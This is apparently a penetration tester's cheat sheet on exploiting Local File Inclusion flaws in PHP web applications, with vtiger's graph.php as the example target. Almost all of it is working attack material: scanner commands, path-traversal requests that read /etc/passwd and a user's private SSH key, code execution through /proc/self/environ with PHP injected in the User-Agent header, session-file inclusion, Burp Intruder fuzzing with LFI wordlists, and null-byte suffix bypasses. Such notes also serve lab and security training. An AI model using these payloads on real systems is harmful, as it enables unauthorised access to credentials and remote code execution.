Good to add to the tool-belt when you're looking to see what sensitive files exists and are readable once you've found a LFI vulnerability. It also includes a Mode (ICE-Breaker) to scan a potential target using an encoded path traversal list - which helps in LFI discovery.
nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP ..in kali
Whoami Home SSH:
whoami:
/proc/self/status ..match 100:101 with /etc/passwd
Home directory:
/etc/passwd ..learn home path
/var/lib/asterisk/ ..check home path
/var/lib/asterisk/.ssh/id_rsa ..priv ssh key here?
Code exe with 'environ'
If you have access to 'environ' - you might have code execution
Burp > Repeater > /proc/self/environ
graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go
Fuzzing LFI
Burp > Intercept > Send to Intruder > Positions
Clear & Add: $attack$
graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
|
Keyword for fuzz
Payloads > Load > burp-fuzz >
LFI-LogFileCheck.txt
LFI-InterstingFiles.txt
Start Attack
Sort by Length ..to see results
RFI from LFI (php cookies)
If you can locate the 'session' cookies
You may be able to inject them into Burp Repeater to get an Execution
cd vtiger/ ..if you have the source
grep -R phpinfo\(\)
maybe: Image/Canvas/PDF.php ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123
Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution
Adding a NULL BYTE will get rid of suffix (on older systems)
Works well in Perl and older versions of PHP (solved since 5.3.4)
Scenario: Server is adding .png automatically to your page
http://abc.so/file.php?file=photo .. ok
http://abc.so/file.php?file=photo.png .. nothing
http://abc.so/file.php?file=photo.png%00 .. ok
http://abc.so/file.php?file=file.php%00 .. ok
http://abc.so/file.php?file=/../../etc/passwd%00 .. win